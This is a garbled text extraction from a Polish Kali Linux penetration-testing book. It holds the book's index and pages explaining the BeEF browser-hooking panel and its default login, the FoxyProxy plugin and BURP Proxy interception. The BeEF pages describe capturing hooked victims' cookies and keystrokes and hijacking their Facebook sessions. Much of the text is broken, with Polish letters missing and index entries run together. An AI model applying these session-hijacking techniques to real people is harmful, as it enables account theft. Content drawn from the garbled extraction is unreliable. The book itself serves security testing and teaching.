ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat

299zawarto ci plikoacutew PDF 299

da HTTP 203aplet Java 156aplikacje internetowe 23

b dy w zabezpieczeniach286

wykrywanie i mapowanie 241zakres testoacutew penetracyjnych

23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212

ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki

brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji

internetowych 147na parametry metod GET

i POST 131na protoko y komunikacyjne

256na serwery aplikacji

internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie

zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151

amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257

wykorzystuj ce przeci eniepo cze sieciowych 256

XSS 223 248z klonowaniem 151z u yciem narz dzi

penetracyjnych opartychna przegl darkach 236

audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301

Authentication hijacking 225Autopsy 295AV 31

BBackTrack 38badanie zasoboacutew sieci

komputerowych 65bazy danych 218BeEF 232

panel zarz dzania pakietu 234przechwycony system 235

bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272

a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania

i urz dze 274podstawowe wymogi 273

bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych

288 291narz dzia 293partycje 292suma kontrolna 294

Kup książkę Poleć książkę

Skorowidz

330

black-box 24 30BootKey 171 173Browser Exploitation

Framework 232brute-force 125 170

amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238

Intercept 241opcje konfiguracyjne 239

Burp Spider 241 244Burp Suite 238

Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty

CEH 311CISSP 31 193g oacutewnego urz du certyfikacji

106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282

chkrootkit 295chntpw 180

uruchomienie w Kali Linux182

ciasteczka 197edytowanie zawarto ci 199

201niezabezpieczone 208obrona przed

przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200

ci g zaburzaj cy 170Cisco Network Foundation

Protection 275CISSP 193Clickjacking 196

kod roacuted owy stron 197obrona przed atakiem 287

CmosPwd 190

Cookie Cadger 203dane o sesji 204

Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185

znaki specjalne 186CutyCapt 327czarne pude ko 24

DDBPwAudit 229dc3dd 293 297dd 291DDoS 256

kategorie atakoacutew 256obrona przed atakiem 285

Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128

raport 130Distributed Denial of Service

256DNS 267DNSChef 266dokumentacja 306DoS 256

kategorie atakoacutew 256obrona przed atakiem 285

dost p do systemualternatywny 37techniki XSS 225

dost pno 30Dradis 325Driftnet 217dsniff 212

nas uchiwaniei przechwytywaniepakietoacutew 213

uruchamianie 214dual-boot configuration 44

EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate

Authority 282Ettercap 214

lista celoacutew 216skanowanie sieci 216

Exploitation Tools 36 37 48exploity 92 113

Reserve_TCP Meterpreter156

Ffa szywe

adresy IP 285odpowiedzi DNS 267witryny 159 252

Ferret 209uruchamianie 210

FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84

utworzenie nowego projektu84

Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170

kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93

Ggenerator

hase 278adunkoacutew 132

GHDB 63GIT 250glosariusz 319

Kup książkę Poleć książkę

Skorowidz

331

Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246

instancja projektu 225

HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137

dost pu 250generowanie listy 185amanie 169

ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169

249si a 277w systemie Linux 173w systemie Windows 171

haszowanie 170z dodatkiem soli

kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125

uruchomienie 128

IICMP Echo Request 70identyfikacja

adresoacutew URL 227celoacutew za pomoc serweroacutew

DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci

188

iFrame 196Information Gathering 34 46informatyka ledcza 287

zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria

spo eczna 148wsteczna 48

ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142

Jj zyk SQL 218John the Ripper 137 173

domy lna konfiguracjacie ek 176

haszowanie 170amanie hase 174

proces 137amanie pliku hase 139

s owniki 138 177szybko dzia ania 138

Johnny 138amanie hase 174

opcje konfiguracyjneprogramu 175

s owniki 177uruchamianie 175

KKali Linux 15

aktualizacja pakietu SET 150instalowanie 40

pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania

sprz towe 40narz dzia dost pne

w systemie 46Network Install 40proces konfigurowania

partycji dysku 42publiczny adres IP 225s owniki 129

uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39

wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147

aplikacji internetowych 169191

HTTP 262klonowanie

rodowiska 278witryny internetowej 66 153

158 251 279klucze uruchamiania systemu

171 173komunikaty

ICMP 70o up ywie czasu dania 70

kopiowanie plikoacutew SAMi SYSTEM z hosta 172

LLinux amanie hase 173lista

adresoacutew URL 227potencjalnych hase 185

listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263

tryby 266luki w zabezpieczeniach

aktualizacja bazy 276aplikacji internetowych 245

254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty

elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92

LVM 43

Kup książkę Poleć książkę

Skorowidz

332

adunek 117amanie hase 137 169

bezp atne us ugi sieciowe190

haszowanych 189maska 189narz dzia 174przechowywanych w plikach

systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper

174zabezpieczaj cych BIOS

komputera 190cza modyfikacja 196

MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74

zadania 76Maltego CaseFile 326man-in-the-middle 139 211

obrona przed atakiem 281przeprowadzanie manualne

212maska 189mechanizmy

HSTS 140klonowania 153obronne 231 271

testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego

po czenia SSL 257usuwania mi kkich b doacutew

404 93mened er LVM 43metadane 83

wyszukiwanie i analiza 83Metasploit 113 154

skanowanie sieci lokalnej 114wersja konsolowa 114

meterpreter 151uruchomienie sesji 156wykorzystanie 156

metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24

310 323metody

pojedynczegouwierzytelniania 194

szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem

Windows 172

Nnag oacutewki X-Frame-Options 287narz dzia

do klonowania witryn 281do amania hase 174do przechwytywania sesji

198do przeprowadzania atakoacutew

DoSDDoS 285ledcze 295

wspomagaj ce tworzenieraportoacutew 325

nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228

nazwy DNS 71Nessus 162

HomeFeed 163instalowanie w systemie

Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164

Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe

263Nmap 76

agresywne skanowanie 79graficzny interfejs

u ytkownika 77okno wynikoacutew skanowania 82opcje 79

NoScript 287no niki danych 288

Oobrona przed atakami

Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek

286SSLstrip 284

ocena ryzyka 30formu y 31okna serwisowe 277

ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183

uruchomienie w Kali Linux184

osobista weryfikacja to samo ci194

oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu

poufno ci 307otwarta implementacja sterownikoacutew

kart graficznych 178Owasp-Zap 105 245

automatyczne logowanie 110konfigurowanie przegl darki

108mechanizm aktualizacji ca ego

pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111

PPAE 39pakiety

ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259

pami masowa urz dze 289partycje 172

wymiany 291Pasco 299Password Attacks 37 47 174Patator 229

Kup książkę Poleć książkę

Skorowidz

333

pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki

binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180

wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie

299poczta elektroniczna 123

fa szywe wiadomo ci 159podatno na atak 29

aktualizacja bazy 276aplikacji internetowych 245

254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226

podnoszenie uprawnie 37podstawowe wymogi

bezpiecze stwa 303podsumowanie ustale 313polecenia

apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70

getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116

polityka zarz dzania has ami 277po czenia

HTTP 268HTTPS 268

po czeniaTCP 267troacutejetapowe 79VPN 282

poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276

porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142

poufno 30poziom zabezpiecze

minimalny 274podstawowy 274

PREROUTING 143

Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty

Emily 59Gruyere 224 246

promiscuous mode 47Protocol Attacks 256protoko y

8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281

ProxyStrike 98robot sieciowy 100

przechwytywanieciasteczek 197 209 286danych logowania

u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych

w sieci 217pakietoacutew 213

sieciowych 210TCP 259

przechwytywaniepo cze 161

TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267

270sesji 197 208 233

narz dzia 198przegl d projektu 306przegl darki 232

ochrona przed atakami 236zabezpieczenia 249

przekazywanie pakietoacutew IP 142212

przekierowaniepo cze 284portoacutew komunikacyjnych

142ruchu sieciowego 141sesji 284

przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173

Kup książkę Poleć książkę

Skorowidz

334

RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy

b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce

tworzenie 325o wiadczenie o zachowaniu

poufno ci 307podatno ci i luki

w zabezpieczeniach 315podsumowanie ustale 313

zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury

testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje

dla rodowiska sieciowego316

wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami

dokumentacji 308zgodno ze standardami

i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316

powykonawcze 28rekonesans 34 51

badanie zasoboacutew siecikomputerowych 65

Google hacking 61

Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy

adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u

ICMP 69z wykorzystaniem serweroacutew

DNS 71zadania 52zasoby serwisoacutew

spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54

rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia

zdarzenia 31rootkit 295rozsy anie spreparowanych

pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206

adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285

SSAM 171samdump2 178Scalpel 299

Scapy 257 259scenariusze atakoacutew 260

security assessment 21security audit 21serwery 91

aplikacji internetowych 92223zabezpieczanie 136 249

atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236

wykorzystanie 238Samba 116sieciowe 91WWW 262

serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71

serwisy spo eczno ciowe 58sesja 195

ciasteczka 197logowania 205mechanizmy bezpiecze stwa

195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249

adres IP sklonowanej witryny158

aplet Java 156Credential Harvester Attacks

157Exploit to deliver 154importowanie w asnych

plikoacutew witrynyinternetowej 158

IP addresshostname forreverse connection 154

mechanizmy chroni ceprzeprowadzany atak 155

NATPort forwarding 154przechwycenie nazw kont

i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych

wiadomo ci 159URL you want to clone 154

Kup książkę Poleć książkę

Skorowidz

335

uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku

z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery

biometryczne 194stron internetowych 246

skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u

ICMP 70Skipfish 95

raport 97s owniki 96

skryptyopakowuj ce 228wykrywanie

nieautoryzowanychskryptoacutew 287

XSS 224 226SLE 31Slowloris 261s owa kluczowe

dbs 222FUZZ 133 135tables 222

sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata

31sqlmap 221SSL stripping 140SSLstrip 140 197 211

konfigurowanieprzekierowania portoacutew 142

mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141

SSO 194

standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293

baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy

BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia

i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231

szablony witryn 251szare pude ko 24szyfrowane po czenia

https 197VPN 282

Ttablice t czowe 170 189

amanie hase systemuWindows 183

Tamper Data 125TCPReplay 270Tenable 163testowanie

dzia ania roacute nych urz dzesieciowych 270

mechanizmoacutew obronnych 273odporno ci na przeci enia

268podatno ci na ataki XSS 224sklonowanego rodowiska

279testy

o nieograniczonym zakresiedzia ania 26

odporno ci na przeci eniesystemu 256

warunkoacutew skrajnych 256

testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu

zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu

Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33

THX-SSL-DOS 257tokeny 194

sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259

Uumowy

oczekiwania klienta 317potencjalne problemy

i zagadnienia 324rozliczane wed ug zu ycia

czasu i zasoboacutew 305wykaz prac 319ze sta cen 304

unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi

NAT 251profesjonalne 304w chmurze 211

usuwanie ladoacutew w amania 38utrzymanie zdobytego

przyczoacute ka 37uwierzytelnianie 193

ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193

Kup książkę Poleć książkę

Skorowidz

336

VVega 101

modu serwera proxy 104zestawienie znalezionych

podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32

Ww3af 120

wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122

w3mir 281warto

ryzyka 32sumy kontrolnej 293zasobu 31

WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92

obs uga programu 93raport 95

WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132

Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171

ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie

plikoacutew 172partycja systemu 172uzyskanie dost pu do

systemu 180Windows Reverse_TCP

Meterpreter 154Wireless Attacks 47Wireshark 206

filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie

ciasteczek 198kodu 248

kodu SQL 218pakietoacutew 228skryptoacutew 223

wtyczki przegl darki Firefox 198wykaz prac

dodatkowe elementy 323dodatkowe uzgodnienia

prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania

i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy

penetracyjne 321wykorzystywanie

b doacutew w zabezpieczeniachprzegl darki 196

exploitoacutew 92luk w zabezpieczeniach 113

254systemoacutew poczty

elektronicznej 123zidentyfikowanych

podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie

luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92

wytyczne 28 304

XXSS 223

aplikacje internetowe 248testowanie podatno ci 224

XSS cookie stealing 225

Zzabezpieczanie

serweroacutew aplikacjiinternetowych 249

systemoacutew pod czonychdo internetu 271

zakres prac 319cel testu 33definicja

przestrzeni celoacutew 27systemoacutew 26

zdobycia flagi 28dokument 25identyfikacja obszaroacutew

krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o

planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby

prze amywaniazabezpiecze 27

rekomendacjepowykonawcze 28

specyfikacja raportuko cowego 28

ZAP 236 245obrona przed zdalnymi

atakami 249Zaproxy 105zarz dzanie

aktualizacjami 275poprawkami zabezpiecze

275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308

zasoby sieciowe odpornona przeci enie 263

zatarcie ladoacutew penetracji systemu38

zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125

Host details 81Zero-day 275zewn trzny dysk USB 292zmienne

LHOST 118RHOST 117

znaczniki czasu 172zrzut okna 327

daniaForm 131mapowanie 24

Kup książkę Poleć książkę

Page 11: Tytuł oryginału: Web Penetration Testing with Kali Linuxpdf.helion.pl/kalili/kalili.pdf · Uruchamianie systemu Kali Linux z no nika zewnÚtrznego 39 Instalowanie systemu Kali Linux

Kali Linux Testy penetracyjne

234

W naszym przypadku panel zarz dzania pakietu jest dost pny pod adresem http17216861443000uipanel Domy lna nazwa u ytkownika i has o dost pu brzmi identycznie beef

Kiedy ofiara ataku wejdzie lub zostanie przekierowana na stron hookjs napastnik zobaczyna panelu zarz dzania serwera BeEF informacj o nowej przegl darce BeEF doda nowy systemdo listy potencjalnych celoacutew i b dzie wy wietla go za ka dym razem kiedy ofiara ataku po-jawi si w sieci Przegl darki ofiar ktoacutere w danej chwili s od czone od internetu b d po-datne na atak kiedy znowu pod cz si do sieci niezale nie od tego czy ponownie odwiedzwcze niej stron hookjs Na kolejnym rysunku przedstawiono wygl d g oacutewnego okna paneluzarz dzania serwera BeEF z widocznymi opcjami ataku na przechwycony system

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

235

Widoczny na poprzednim rysunku host ktoacuterego przegl darka zosta a przechwycona to lap-top pracuj cy pod kontrol systemu Windows BeEF potrafi odkry bardzo wiele szczegoacute oacutewna temat przechwyconego systemu na przyk ad to czy ofiara u ywa przegl darki Firefox czyhost pracuje pod kontrol 32- czy 64-bitowego systemu operacyjnego jakie dodatkowewtyczki zosta y zainstalowane w przegl darce czy obs uga skryptoacutew i apletoacutew Java jest w -czona itp Na skompromitowanych systemach napastnik mo e zdalnie wykonywa roacute ne po-lecenia w cza sygna d wi kowy przechwytywa ciasteczka sesji tworzy zrzuty ekranuprzechwytywa wszystkie znaki wpisywane z klawiatury a nawet wykorzystywa przechwy-con przegl dark jako serwer proxy do atakowania innych systemoacutew Przyk adem zastoso-wania pakietu mo e by sytuacja w ktoacuterej u ytkownik skompromitowanego systemu logujesi do serwisu takiego jak Facebook Napastnik dzi ki pakietowi BeEF mo e przechwyciciasteczko takiej sesji a nast pnie u y go w swojej przegl darce do przechwycenia sesjiu ytkownika i uzyskania dzi ki temu pe nego dost pu do konta Facebook ofiary Nietrudnosobie wyobrazi e w takiej sytuacji z o liwe i destrukcyjne mo liwo ci napastnika s prak-tycznie nieograniczone Raz uchwycony przyczoacute ek daje nieograniczony dost p do przegl -darki ofiary i jej sesji

BeEF dostarcza napastnikowi szczegoacute owych informacji na temat zaatakowanego systemu i logujewszystkie wykonywane w nim polecenia Informacje o zaatakowanym systemie oraz dziennikwykonanych polece mog by bez problemu skopiowane i wklejone do raportu ko cowego

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

236

Obrona przed atakami dokonywanymi z u yciem narz dzi penetracyjnych opartych na prze-gl darkach jest bardzo trudna Najlepszym rozwi zaniem jest oczywi cie zadbanie o to aby zaw-sze korzysta z najnowszej wersji przegl darki z zainstalowanymi najnowszymi pakietami aktuali-zacji oraz z wy czon mo liwo ci uruchamiania apletoacutew Java czy animacji Flash Oproacutecztego dodatkow warstw zabezpiecze mog zapewni rozwi zania pozwalaj ce na wykrywanienajcz ciej spotykanych zagro e takie jak system NGIPS (ang Next Generation IntrusionPrevention System) Znacz c wi kszo ofiar atakoacutew przeprowadzonych z wykorzystaniemnarz dzi takich jak BeEF stanowi u ytkownicy ktoacuterzy klikn li specjalnie przygotowane czezamieszczone w wiadomo ci poczty elektronicznej lub udost pnione w popularnych serwi-sach spo eczno ciowych przez napastnika podaj cego si za kogo innego godnego zaufania

FoxyProxy mdash wtyczka przegl darki Firefox

Je eli masz przegl dark Firefox i chcesz u ywa serweroacutew proxy takich jak ZAP mdash Zed At-tack Proxy czy BURP do testowania aplikacji internetowych to mo esz skorzysta z wtyczkiFoxyProxy ktoacutera znakomicie upraszcza proces prze czania oraz w czania i wy czania po-szczegoacutelnych serweroacutew proxy Inaczej moacutewi c FoxyProxy to wtyczka przegl darki Firefoxpozwalaj ca na atwe zarz dzanie serwerami proxy modyfikacj ich ustawie oraz ich w -czanie i wy czanie Wtyczk FoxyProxy mo esz pobra z sieciowego repozytorium rozsze-rze programy Firefox

Gdy zainstalujesz wtyczk na pasku narz dzi w goacuternej cz ci g oacutewnego okna przegl darkipojawi si ikona FoxyProxy Kiedy j klikniesz lewym przyciskiem myszy wy wietli si oknoopcji i ustawie wtyczki

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

237

Aby doda nowy serwer proxy do wtyczki FoxyProxy powiniene wykona polecenia przed-stawione poni ej

1 Kliknij przycisk Add New Proxy Na ekranie pojawi si nowe okno dialogowe 2 Wybierz opcj Manual Proxy Configuration 3 Wpisz adres IP lub nazw serwera proxy oraz podaj numer jego portukomunikacyjnego

4 Kliknij przycisk OK aby zapisa ustawienia nowego serwera

W tym momencie wtyczka FoxyProxy jest jeszcze wy czona co oznacza e ca y ruch sieciowygenerowany przez przegl dark odbywa si bez po rednictwa serwera proxy (w polu SelectMode jest ustawiona opcja Completely disable FoxyProxy) Aby u y wybranego serwera proxyrozwi list Select Mode i wybierz z niej dan opcj Jak wida dzi ki takiemu rozwi zaniumo esz szybko prze cza przegl dark na roacute ne serwery proxy lub ca kowicie wy czymo liwo korzystania z serwera proxy

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

238

BURP Proxy

BURP Proxy to narz dzie ktoacutere przechwytuje ruch HTTP oraz HTTPS co pozwala pentesterowina badanie funkcjonowania aplikacji internetowych wyszukiwanie luk w ich zabezpieczeniachoraz analizowanie ruchu sieciowego generowanego mi dzy serwerem aplikacji a klientemPakiet BURP Proxy cieszy si ogromn popularno ci nie tylko ze wzgl du na zdolno prze-prowadzania analizy ruchu sieciowego ale roacutewnie a mo e przede wszystkim ze wzgl du namo liwo modyfikacji i retransmitowania przesy anych da bdquow locierdquo Za chwil wyja nimy jakwykorzysta pakiet BURP Proxy do modyfikowania da i wykradania danych uwierzytel-niaj cych u ytkownikoacutew

Pami taj e BURP Proxy to narz dzie wchodz ce w sk ad rozbudowanego pakietu narz dzio nazwie Burp Suite Kiedy u ytkownik wpisuje na pasku adresu swojej przegl darki wybranyadres URL taki jak na przyk ad httpwwwDrChaoscom oczekuje e zostanie przeniesionyna tak stron Serwer proxy przechwytuje takie danie i przesy a je do serwera niejakobdquow imieniurdquo danego klienta Serwery proxy s zazwyczaj wykorzystywane do monitorowania ge-nerowanego ruchu sieciowego oraz ochrony klientoacutew przed potencjalnie szkodliwymi danymi(np witrynami ze z o liwym oprogramowaniem czy witrynami zainfekowanymi) Jako pente-ster mo esz wykorzystywa serwery proxy do przechwytywania ruchu sieciowego wysy anegoprzez klienta a nast pnie kopiowania modyfikowania i retransmitowania jego da

Aby w systemie Kali Linux uruchomi program BURP Suite w menu g oacutewnym przejd do grupyKali Linux a nast pnie wybierz polecenie SniffingSpoofingWeb Sniffersburpsuite

Na ekranie pojawi si g oacutewne okno pakietu Burp Suite

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

239

Aby skonfigurowa serwer proxy przejd na kart Proxy Jak atwo zauwa y opcja przechwyty-wania ruchu sieciowego jest domy lnie w czona (Intercept is on) Kiedy jest w czona BURPProxy zatrzymuje wszystkie dania wysy ane z przegl darki klienta do serwera WWW dzi kiczemu pentester ma mo liwo pe nej analizy takiego po czenia Po zako czeniu przegl da-nia pentester mo e r cznie zezwoli na kontynuowanie po czenia

Opcj Intercept musisz wy czy r cznie w przeciwnym wypadku wszystkie dania wysy ane przezklienta b d przechwytywane i zatrzymywane na poziomie BURP Proxy

Kolejne opcje konfiguracyjne na ktoacutere musisz zwroacuteci uwag s umieszczone na karcieOptions Znajdziesz tutaj opcje pozwalaj ce na sprawdzenie lub zmian domy lnego portukomunikacyjnego wykorzystywanego przez BURP Proxy czy skonfigurowanie interfejsu sie-ciowego wykorzystywanego przez pakiet Domy lnie serwer BURP Proxy jest skonfigurowa-ny do pracy na interfejsie p tli zwrotnej jak przedstawiono na rysunku zamieszczonym poni ejInterfejs p tli zwrotnej to specjalny rodzaj interfejsu sieciowego reprezentuj cy komputer lokal-ny do ktoacuterego przypisany jest zazwyczaj adres IP 127001 Interfejs p tli zwrotnej nie jestpowi zany z adnym urz dzeniem fizycznym i jest stosowany po to aby korzystaj c z po -czenia sieciowego system operacyjny Twojego komputera moacuteg si komunikowa sam ze so-b Inaczej moacutewi c je eli chcesz poprzez sie wysy a do siebie wiadomo ci powinieneu y interfejsu p tli zwrotnej Je eli chcesz wykorzystywa pakiet Burp Suite do pracy z innymikomputerami powiniene w konfiguracji pakietu doda odpowiedni interfejs Ethernet orazpoda jego adres IP

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

240

W naszym przyk adzie b dziemy u ywa interfejsu p tli zwrotnej

Kolejnym etapem b dzie skonfigurowanie przegl darki do pracy z pakietem Burp SuitePraktycznie wszystkie przegl darki mo na skonfigurowa w niemal identyczny lub przynajm-niej bardzo zbli ony sposoacuteb Na kolejnym rysunku przedstawiamy konfiguracj serwera proxyw przegl darce Firefox

Gdy zako czysz konfiguracj serwera proxy w przegl darce przejd na dowoln stron WWWna przyk ad wpisuj c dany adres URL w pasku przegl darki (na przyk ad wwwDrChaoscom)Z pewno ci zauwa ysz e nic si nie wydarzy o Dzieje si tak poniewa opcja Intercept

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

241

jak pami tasz jest domy lnie w czona Je eli przyjrzysz si teraz karcie Intercept to przeko-nasz si e zmieni si jej kolor t a co oznacza e przechwycone zosta o nowe danie

Kiedy klikniesz kart Intercept b dziesz moacuteg dok adnie zbada natur przechwyconego -dania Po zako czeniu mo esz klikn przycisk Forward lub Drop co spowoduje odpowied-nio przes anie dalej lub zablokowanie przechwyconego dania

